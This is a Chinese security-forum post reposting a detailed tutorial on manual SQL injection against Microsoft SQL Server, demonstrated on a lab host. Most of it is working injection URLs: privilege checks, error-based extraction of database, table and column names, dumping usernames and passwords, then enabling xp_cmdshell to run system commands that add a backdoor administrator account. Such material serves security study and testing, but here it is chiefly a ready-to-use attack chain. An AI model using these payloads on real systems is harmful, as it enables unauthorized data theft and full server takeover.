安全矩阵

 找回密码
 立即注册
搜索
查看: 5140|回复: 0

史上最详细的sqlServer手工注入详解

[复制链接]

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2020-3-13 21:00:45 | 显示全部楼层 |阅读模式
本帖最后由 wholesome 于 2020-3-13 21:25 编辑

以下文章来源于saulGoodman,作者saulGoodman
MSSQL数据库
数据库简介
MSSQL是指微软的SQL Server数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。属关系型数据库
注入简介
MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路
对于mssql的一个注入点我们往往最关心的这个注入点的权限问题,是sa、db_owner还是public;其次是这个注点是否显错,注释语句是否可用,例如sql server中注释符“--”;还有就是注入点是什么类型的,是字符型注入,还是数字型注入。
对与mssql有三个权限,sa(最高权限,相当于system),db(文件管理,数据库操作等等,相当于user-administrator),public(数据库操作权限,相当于guest-users)
联合查询
基础知识:MSSQL的系统自带库–>master
其实再每个网站中,一般一个网站不会跨库,而在MSSQL中每个库都有一个系统自带表–>sysobjects
此系统表中对我们有用的只有3个字段,NAME字段和XTYPE字段和ID字段,name就是表名信息,xtype是代表表的类型,只有两个参数,S代表系统自带表,U代表用户创建的表,id字段的值用来连接syscolumns表
syscolumns表中我们需要查询的字段就是name字段
  1. select * from sysobjects where xtype='U';
复制代码
  1. select * from syscolumns where id=2073058421;
复制代码
top关键字:由于MSSQL中不存在limit,那么想要输出一条数据怎么办呢,直接top 1,输出两条数据top 2,输出第二条数据top 1+限制条件!
如何实现MySQL中的group_concat()函数的用法,实例如下:
  1. SELECT top 1 id, [name] = stuff((SELECT ',' + [name] FROM syscolumns sys WHERE sys.id = syscolumns.id FOR xml path('')) , 1 , 1 , '') FROM syscolumns where id =2073058421;
复制代码
Mssql插入新的数据
  1. insert into users (id,username,password,age) values(4,'test','test',20)
  2. 注释:
  3.         insert into users (id,username,password,age):往users表里 id,username,password,age 插入数据
  4.      values(4,'test','test',20)        :插入数据的值为:4,'test','test,'20
复制代码
Mssql修改数据

  1. update users set username='saul123' where id=4;
  2. 注释:
  3.   update users   更新更改 users 表
  4.     set username='saul123'  吧 username 的值修改为 saul123
  5.     where id=4  条件是 id=4 这条数据
复制代码
Mssql删除数据
  1. delete from users where id=4;
  2. 注释:
  3.   delete from users 删除 users 表里的
  4.     where id=4  条件是 id=4 这条数据
复制代码
MSSQL中常用参数
@@version,查询当前数据库版本
db_name(),查询当前数据库名称
user,查询当前用户
IS_SRVROLEMEMBER(),查询数据库权限。
常用权限:sysadmin、serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin
用法如下,证明相应权限则返回1
  1. select IS_SRVROLEMEMBER('sysadmin');
复制代码
Mssql手工注入详解
判断是否是Mssql数据库
  1. http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from sysobjects)>0
复制代码
页面返回正常说明是 mssql 数据库!而且你使用了上面这条语句说明它权限还有点大,还有可能是 sa 权限,因为可以读取任意表。
判断权限
  1. and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
  2. and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
  3. and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
  4. and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
  5. and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
  6. and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
  7. and 1=(select IS_MEMBER('db_owner'));-
复制代码
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
复制代码
页面返回正常,说明他是 sa 权限!
查看当前数据库版本
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select @@version)
复制代码
由上图可见,它的Mssql版本是:Microsoft SQL Server 2005 - 9.00.1399.06 (X64) .
这里为什么要加一个 and 1=(select @@version) 呢?是这样的,and 1 是int类型,它用了 = 后面的(select @@version) 是字符类型,那肯定是不等于啊,那么就会报错从而爆出相关查询信息。
这里为什么会报错呢?因为我们原本访问网站 id=1 查询的是数字类型int,而我们查询的是字符类型,所以他从字符类型转换为int类型失败就导致网站报错从而泄露网站的数据库版本信息!
实际上我们可以直接吧 @@version 放到 id=后面它也会被查询出来:
  1. http://192.168.159.135:8080/get.aspx?id=@@version
复制代码
查看当前数据库名称
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select db_name())
复制代码
同理我们也可以使用这种方式:
  1. http://192.168.159.135:8080/get.aspx?id=db_name()
复制代码
获取第一个用户数据库的名称
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 name from master..sysdatabases where dbid>4)
复制代码
由上图可见,我们爆出来的用户创建的第一个数据库名为 test 。
top 1 是一个SQL查询的子句,它用于查询结果只显示首条记录。​​​​​​​

  1. SELECT TOP 1 * FROM的含义:
  2.   1、select为命令动词,含义为执行数据查询操作;
  3.   2、top 1子句含义为查询结果只显示首条记录;
  4.   3、*子句表示查询结果包括数据源中的所有字段;
  5.   4、from子句为指定数据源。
复制代码
对于 master..sysdatabases 这个意思是这样的:在mssql系统默认数据库master 的系统视图里有这些:
懂我意思吧?
这里我来解释一下后面的 dbid>4 是什么意思:mssql是靠dbid来区分数据库名的!前面4个id号是默认mssql数据库自带的:
所以我们查询的时候需要从 dbid第五个开始查询,因为第五个就是用户所创建的第一个数据库,以此类推!
获取第二个用户数据库的名称
因为刚刚我们爆出来第一个数据库的名称是 test,那么我们就可以使用下面的语句来查询:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name !='test')
复制代码
这里我来解释一下 :where dbid>4 and name !='test' ,这条语句是说明条件是 dbid>4 和 name名字不等于-test的数据库!这样一来我们查询到了第二个用户创建的数据库名为:saulgoodman!假如我们想要查询第三数据库名就可以按照这样的方式以此类推!
第二种方法
使用这种个语句:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 name from master..sysdatabases where dbid>5)
复制代码
我们只需要把 dbid>4 修改为 dbid>5 就可以查询第二个数据库了!以此类推!
(小技巧)获取所有数据库的名字
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select name from master..sysdatabases for xml path)
复制代码
关于 for xml path的意思就是将查询结果集以XML形式展现!
获取表名
获取当前网站数据库所使用的第一个表名:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 name from sysobjects where xtype='u')
复制代码
由上图可知,我们获取到第一个表名是 users,如果想获取到第二个表名的话就可以这样:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 name from sysobjects where xtype='u' and name !='users')
复制代码
这里我来说一下:where xtype='u' and name !='users' ,对于 xtype 我文章开头已经说过了,大家往前翻!后面的意思就是 name 不等于 users 表,那么就会查询下一个表名,这样我们就能获取到 users 表的下一个表名!想要获取到第三个表名就以此类推!
(小技巧)爆出所有表名
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select name from sysobjects for xml path)
复制代码
和上面爆所有数据库名那个一样,简单粗暴!
获取列名
我们知道了表名是 users ,那么就可以利用下面的语句来爆 users 下面的列名:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='users'))
复制代码
获取下一个列名就可以这样:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='users') and name !='id')
复制代码
依次类推我们爆出了下面这些列名:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='users') and name !='id' and name !='username')
复制代码
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='users') and name !='id' and name !='username'  and name !='password')
复制代码
这个时候我们就获取到了网站的表名:users,网站的列名:id,username、password。
获取数据
获取账号 username 的值:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 username from users)
复制代码
想要获取第二个账号 username 的值那么就加一个条件语句 where:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 password from users where id=2)
复制代码
依次类推爆出所有的用户名!
获取密码 password 的值:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 password from users)
复制代码
想要获取第二个密码 password 的值那么就加一个条件语句 where:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select top 1 password from users where id=2)
复制代码
依次类推爆出所有的密码!
Mssql手工注入另类玩法
因为我们刚才知道了网站的权限是 sa 权限,那么我们就可以干很多事,包括执行系统命令等等!
xp_cmdshell:SQL中运行系统命令行的系统存储过程,一般在安全级别较高的服务器权限上。也就是它开启的话我们就可以执行系统命令!
判断xp_cmdshell是否存在:
  1. http://192.168.159.135:8080/get.aspx?id=1 and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
复制代码
可以看到,页面返回正常,说明xp_cmdshell开启了的!
xp_cmdshell默认在mssql_2000中是开启的,在mssql_2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。
详细可看这篇文章:https://bbs.ichunqiu.com/thread-3221-1-1.html​​​​​​​
  1. 开启 xp_cmdshell:
  2. exec sp_configure 'show advanced options', 1;reconfigure;
  3. exec sp_configure 'xp_cmdshell',1;reconfigure;
  4. 关闭 xp_cmdshell:
  5. exec sp_configure 'show advanced options', 1;reconfigure;
  6. exec sp_configure 'xp_cmdshell', 0;reconfigure
复制代码
xp_cmdshell执行命令提权
首先我们服务器上只有这些用户:
我们使用xp_cmdshell对他提权:
  1. http://192.168.159.135:8080/get.aspx?id=1 ;exec master..xp_cmdshell "net user saul saul123 /add"
复制代码
页面返回正常说明执行成功!
我们把 saul 用户添加到管理员组:
  1. http://192.168.159.135:8080/get.aspx?id=1  ;exec master..xp_cmdshell "net localgroup administrators saul /add"
复制代码
这个时候因为它的页面是不回显,那么我们来到服务器看看:
由上图可见,我们创建了一个 saul 用户到目标服务器提权成功了!接下来如果目标是外网那么我们就可以登录到它的远程桌面:
至此,MsSQL手工注入就讲到这里!


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-19 08:15 , Processed in 0.018328 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表